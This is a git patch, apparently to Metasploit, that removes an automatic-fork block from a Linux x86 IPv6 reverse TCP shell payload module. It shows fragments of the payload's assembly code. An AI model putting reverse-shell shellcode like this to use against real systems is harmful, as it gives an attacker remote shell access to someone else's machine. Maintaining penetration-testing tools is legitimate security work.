From 402edba02858f7da7ebc72400a07aff3c463fa68 Mon Sep 17 00:00:00 2001 From: Adam Cammack Date: Wed, 13 Jun 2018 15:26:22 -0500 Subject: [PATCH] Remove automatic fork The PrependFork option works just as well --- .../payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb | 7 ------- 1 file changed, 7 deletions(-) diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb index 5109fcdf6d..c0e96703fd 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb @@ -55,13 +55,6 @@ def generate_stage mov bl,0x1 int 0x80 mov esi,eax - xor eax,eax - mov al,0x2 - xor ebx,ebx - int 0x80 - cmp eax,ebx - je connect - ja exit connect: xor ecx,ecx